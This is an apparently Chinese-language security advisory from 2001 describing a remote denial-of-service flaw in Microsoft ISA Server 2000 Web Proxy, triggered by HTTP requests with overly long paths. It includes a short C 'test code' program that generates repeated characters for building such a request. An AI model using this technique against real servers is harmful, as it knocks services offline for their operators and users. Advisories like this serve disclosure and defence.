Microsoft ISA Server Web Proxy存在拒绝服务攻击发布时间:2001-04-20 更新时间:2001-04-20 严重程度:中 威胁程度:远程拒绝服务 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Microsoft ISA Server 2000详细描述 运行MS ISA服务器程序的主机存在一个漏洞可以导致WEB PROXY服务停止 响应,如果HTTP请求带有超长路径的话,WEB服务就崩溃。这个漏洞一般 只能在内部网络利用,除非WEB Publishing服务使能,默认情况是关闭 这个服务的。攻击者也可以使用HTML EMAIL或者JAVASCRIPT URL来使 用户连接执行。 测试代码 /* * repeat.c -- quick-n-dirty hack to output argv[2] instances of the * character whose ASCII value is given as argv[1] * * WARNING - this has absolutely no error checking! */ #include <stdio.h> main (int argc, char **argv) { int character; long repetitions, i; if ( argc != 3 ) { printf("usage: repeat char reps\n"); exit(1); } character = atoi(argv[1]); repetitions = atol(argv[2]); for (i = 0L; i < repetitions; i++) { printf ("%c", character); } } 解决方案 尚无 相关信息 |
